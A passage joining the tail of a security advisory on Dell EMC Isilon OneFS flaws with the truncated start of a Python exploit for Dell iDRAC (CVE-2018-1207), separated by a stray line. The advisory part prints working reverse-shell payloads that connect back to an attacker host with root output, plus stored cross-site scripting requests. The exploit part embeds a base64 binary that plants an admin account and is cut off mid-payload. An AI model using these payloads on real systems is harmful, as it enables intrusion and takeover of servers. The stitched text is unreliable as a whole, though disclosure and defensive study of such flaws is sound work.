as follows to trigger the execution:

/-----
pepe-1$ sudo tcpdump -i em0 -G 1 -z /tmp/lala.sh -w dump
tcpdump: WARNING: unable to contact casperd
tcpdump: listening on em0, link-type EN10MB (Ethernet), capture size
65535 bytes
/tmp/lala.sh: connect: Connection refused
/tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused
/tmp/lala.sh: connect: Connection refused
/tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused
-----/

As can be seen below, the script runs with root privileges:

/-----
$ nc -lvp 8888
Listening on [0.0.0.0] (family 0, port 8888)
Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2,
sport 57692)
bash: no job control in this shell
[root@pepe-1 /compadmin]# id
uid=0(root) gid=0(wheel)
groups=0(wheel),5(operator),10(admin),20(staff),70(ifs)
-----/

7.3. **Privilege escalation via remote support scripts**

[CVE-2018-1204]
From the documentation:

"OneFS allows remote support through EMC Secure Remote Services (ESRS)
which monitors your EMC Isilon cluster, and with your permission, allows
remote access to Isilon Technical Support personnel to gather cluster
data and troubleshoot issues."

"After you enable remote support through ESRS, Isilon Technical Support
personnel can request logs with scripts that gather EMC Isilon cluster
data and then upload the data.
The remote support scripts based on the Isilon isi_gather_info
log-gathering tool are located in the /ifs/data/Isilon_Support/
directory on each node."

"Additionally, isi_phone_home, a tool that focuses on cluster- and
node-specific data, is enabled once you enable ESRS. This tool is
pre-set to send information about your cluster to Isilon Technical
Support on a weekly basis. You can disable or enable isi_phone_home from
 the OneFS command-line interface."

As a cluster administrator or compadmin, it is possible to enable the
remote support functionality, hence enabling the isi_phone_home tool via
sudo. This tool is vulnerable to a path traversal when reading the
script file to run, which would enable an attacker to execute arbitrary
python code with root privileges.

If remote support is not enabled, an attacker could perform the
following operations in order to enable it:

/-----
pepe-1$ sudo isi network subnets create 1 ipv4 1
pepe-1$ sudo isi network pools create 1.0
pepe-1$ sudo isi remotesupport connectemc modify --enabled=yes
--primary-esrs-gateway=10.10.10.10 --use-smtp-failover=no
--gateway-access-pools=1.0
-----/

The isi_phone_home tool is supposed to run scripts located in the
root-only writable directory /usr/local/isi_phone_home/script.
However, the provided script name is used to construct the file path
without sanitization, allowing an attacker to reference other locations.

/-----
def run_script(script_file_name):
    script_path = CFG.get('SCRIPTDIR') + '/' + script_file_name
    if os.path.isfile(script_path):
        cmd = 'python ' + script_path  + ' 2>&1 '
        command_thread = command.Command(cmd)
        exit_code, output =
command_thread.run(int(CFG.get("SCRIPT_TIEMOUT")))
        if exit_code:
            logging.error("Error: {0} running script: {1}
".format(str(exit_code), output))
    else:
        logging.error("File: {0} list_file_name doesn't exist
".format(script_path))
-----/

The final step would be to create a malicious python script on any
writable location and call it via the isi_phone_tool using sudo.
Keep in mind that the previous steps are not required if the system does
already have remote support enabled.

/-----
pepe-1$ cat /tmp/lala.py
#!/usr/bin/env python

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.1.66",8888))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

pepe-1$ sudo /usr/bin/isi_phone_home --script-file
../../../../../tmp/lala.py
-----/

/-----
$ nc -lvp 8888
Listening on [0.0.0.0] (family 0, port 8888)
Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2,
sport 56807)
pepe-1# id
uid=0(root) gid=0(wheel)
groups=0(wheel),5(operator),10(admin),20(staff),70(ifs)
-----/

7.4. *Persistent cross-site scripting in the cluster description*

[CVE-2018-1186]
The description parameter of the /cluster/identity endpoint is
vulnerable to cross-site scripting.

After the cluster's description is updated, the payload will be executed
every time the user opens the Web console.

/-----
PUT /platform/3/cluster/identity HTTP/1.1
Host: 192.168.1.11:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0)
Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 61
Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24;
Connection: close

{"description":"my cluster<img src=x onerror=\"alert(1)\"/>"}
-----/

7.5. **Persistent cross-site scripting in the Network Configuration page**

[CVE-2018-1187]
The description parameter of the /network/groupnets endpoint is
vulnerable to cross-site scripting.

After the description is updated, the payload will be executed every
time the user opens the network configuration page.

/-----
POST /platform/4/network/groupnets HTTP/1.1
Host: 192.168.1.11:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0)
Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/json
Content-Length: 186
Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41;
Connection: close

{"description":"lala<script>alert(1)</script>","dns_cache_enabled":true,"dns_options":[],"dns_search":[],"dns_servers":[],"name":"pepito2","server_side_dns_search":false}
-----/

7.6. **Persistent cross-site scripting in the Authentication Providers
page**

[CVE-2018-1188]
The realm parameter of the /auth/settings/krb5/realms endpoint is
vulnerable to cross-site scripting.

After the realm is updated, the payload will be executed every time the
user opens the Kerberos tab of the Authentication Providers page.

/-----
POST /platform/1/auth/settings/krb5/realms HTTP/1.1
Host: 192.168.1.11:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0)
Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/json
Content-Length: 78
Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41;
Connection: close

{"is_default_realm":true,"kdc":[],"realm":"ASDASD<img src=x
onerror=alert(1)"}
-----/

7.7. **Persistent cross-site scripting in the Antivirus page**

[CVE-2018-1189]
The name parameter of the /antivirus/policies endpoint is vulnerable to
cross-site scripting.

After the name is updated, the payload will be executed every time the
user opens the Antivirus page.

/-----
POST /platform/3/antivirus/policies HTTP/1.1
Host: 192.168.1.11:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0)
Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/json
Content-Length: 172
Cookie: isisessid=c6903f55-43e7-42e2-b587-9f68142c3e06;
Connection: close

{"name":"pepe<img src=x
onerror=\"alert(1)\"/>","description":"pepito","enabled":true,"force_run":false,"impact":null,"paths":["/ifs"],"recursion_depth":-1,"schedule":null}
-----/

7.8. **Persistent cross-site scripting in the Job Operations page**

[CVE-2018-1201]
The description parameter of the /job/policies endpoint is vulnerable to
cross-site scripting.

After the description is updated, the payload will be executed every
time the user opens the Impact Policies section of the Job Operations
page.

/-----
POST /platform/1/job/policies HTTP/1.1
Host: 192.168.1.11:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 210
Cookie: isisessid=8a5026c0-f045-4505-9d2b-ae83bc90f8ea;
Connection: close

{"name":"my policy","description":"<img src=x
onerror=\"alert(1)\"/>","intervals":[{"begin":"Sunday
00:00","end":"Sunday
00:00","impact":"Low"},{"impact":"Low","begin":"Sunday
01:03","end":"Monday 01:01"}]}
-----/

7.9. **Persistent cross-site scripting in the NDMP page**

[CVE-2018-1202]
The name parameter of the /protocols/ndmp/users endpoint is vulnerable
to cross-site scripting.

After the name is updated, the payload will be executed every time the
user opens the NDMP Settings section of the NDMP page.

/-----
POST /platform/3/protocols/ndmp/users HTTP/1.1
Host: 192.168.1.11:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0)
Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 64
Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24;
Connection: close

{"name":"<img src=x onerror=\"alert(1)\"/>","password":"123123"}
-----/

8. **Report Timeline**

2017-09-25: Core Security sent an initial notification to Dell EMC,
including a draft advisory.
2017-09-26: Dell EMC confirmed reception and informed an initial
response would be ready by October 5th.
2017-10-05: Dell EMC confirmed problem exists for all vulnerabilities
reported except one, for which evaluation will be finalized soon. Dell
EMC stated that, for the confirmed issues, a remediation plan will be
provided by 10/16.
2017-10-05: Core Security thanked the follow up email.
2017-10-06: Dell EMC reported an update on one privilege escalation
vulnerability reported, stating that 'ISI_PRIV_AUTH, and ISI_PRIV_ROLE
both are equivalent to admin level access'. They said they will be
updating the documentation to make it clearer.
2017-10-11: Core Security thanked for the clarification and confirmed
that section will be removed from the final advisory.
2017-10-16: Dell EMC sent a schedule for fixing six of the reported
vulnerabilities, with specific dates for every product's version.
2017-10-16: Core Security thanked the information and said it will
analyze the proposals sent once all the data is available.
2017-10-19: Dell EMC sent a schedule for the remaining three reported
vulnerabilities, with specific dates for every product's version.
2017-10-31: Core Security on the schedule sent, stating that fixing the
vulnerabilities by June 2018 is unacceptable given current industry
standards. Requested a review of the timeline or a thorough explanation
that justifies such delay.
2017-11-01: Dell EMC answered back stating that after reviewing the
original schedule, they said they believe they could have fixes ready
for versions 8.0.x and 8.1.x by January 2018. Only caveat is the
vulnerability 7.1 that might be pushed past January, although they said
they think they could meet the January deadline.
2017-11-13: Core Security thanked Dell's review of the release dates and
agreed on the proposed schedule, stating Core Security would like to
publish a single advisory for all the vulnerabilities reported.
Also requested CVE IDs for
each of the issues.
2018-01-16: Core Security asked for a status update on the release date
for the fixes since there was no update from Dell EMC.
2018-01-17: Dell EMC answered back stating they are awaiting
confirmation from the product team about the exact dates of release.
They said they will get back to us by the end of this week. Dell EMC
also asked our GPG public key again.
2018-01-18: Core Security thanked for the update and sent the advisory's
public GPG key.
2018-01-19: Dell EMC stated they are currently working on drafting their
advisory and will send it back to us (including CVEs) once they have the
necessary approvals.
2018-01-23: Dell EMC asked for our updated draft advisory.
2018-01-23: Core Security sent the updated draft advisory to Dell EMC.
2018-01-25: Dell EMC notified that the team are targeting to have the
fix available by February 12th. Additionally, Dell will send its draft
advisory by January 31th.
2018-01-29: Core Security thanked for the update and proposed February
14th as publication date.
2018-01-31: Dell EMC informed Core Security that they agreed to release
on February 14th. They also provided CVE IDs for each vulnerability
reported.
2018-02-01: Dell EMC sent its draft advisory.
2018-02-14: Advisory CORE-2017-0009 published.

9. **References**

[1]
https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm

10. **About CoreLabs**

CoreLabs, the research center of Core Security, is charged with
anticipating the future needs and requirements for information security
technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at: http://corelabs.coresecurity.com.

11. **About Core Security**

Core Security provides companies with the security insight they need to
know who, how, and what is vulnerable in their organization. The
company's threat-aware, identity & access, network security, and
vulnerability management solutions provide actionable insight and
context needed to manage security risks across the enterprise. This
shared insight gives customers a comprehensive view of their security
posture to make better security remediation decisions. Better insight
allows organizations to prioritize their efforts to protect critical
assets, take action sooner to mitigate access risk, and react faster if
a breach does occur.

Core Security is headquartered in the USA with offices and operations in
South America, Europe, Middle East and Asia. To learn more, contact Core
Security at (678) 304-4500 or info@coresecurity.com


12. **Disclaimer**

The contents of this advisory are copyright (c) 2017 Core Security and
(c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
HireHackking 
# Exploit Title: Dell EMC iDRAC7/iDRAC8 2.52.52.52 -  Remote Code Execution (RCE)
 via file upload
# Date: 2024-08-28
# Exploit Author: Photubias
# Vendor Homepage: https://dell.com
# Vendor Advisory: [1] https://dl.dell.com/manuals/all-products/esuprt_solutions_int/esuprt_solutions_int_solutions_resources/dell-management-solution-resources_White-Papers6_en-us.pdf
# Version: integrated Dell Remote Access Console v7 & v8 < 2.52.52.52
# Tested on: iDRAC 7 & 8
# CVE: CVE-2018-1207

r'''
    Copyright 2024 Photubias(c)        
    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.
    
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
    
    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.
    
    File name CVE-2018-1207.py
    written by Photubias

    CVE-2018-1207 is an unauthenticated file upload and 
     so library execution vulnerability on the HTTPS web interface. 
    This exploit contains a checker and a builtin exploit to add a webuser for remote admin access
    
    # Manual verification example, if libraries are returned, the target is vulnerable: 
    #      curl -ik "http://192.168.1.100//cgi-bin/login?LD_DEBUG=files"
    
    Feel free to scan your network via the iDRAC fingerprinter to find vulnerable systems:
    https://github.com/tijldeneut/Security/blob/master/iDRAC-fingerprinter.py

    This is a native implementation, written in Python 3 and only requires requests (pip3 install requests)
    Works equally well on Windows as Linux (as MacOS, probably ;-)

    Features: vulnerability checker + exploit

    WARNING: The built-in payload is precompiled and does this:
    - Configure USER ID 13 with username 'user', password 'Passw0rd' and as an iDRAC webadmin
    - Any user that might be at ID 13 will be overridden and is unrecoverable
    - TIP1: use racadm for command line access after exploitation (also uses TCP/443)
    - TIP2: use racadm to retrieve user hash with command: racadm -r <ip> -u user -p Passw0rd get iDRAC.Users.2
'''

import requests, optparse, base64, struct, time
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
requests.warnings.filterwarnings('ignore', category=DeprecationWarning) 

iTimeout = 10

sPayloadCode ='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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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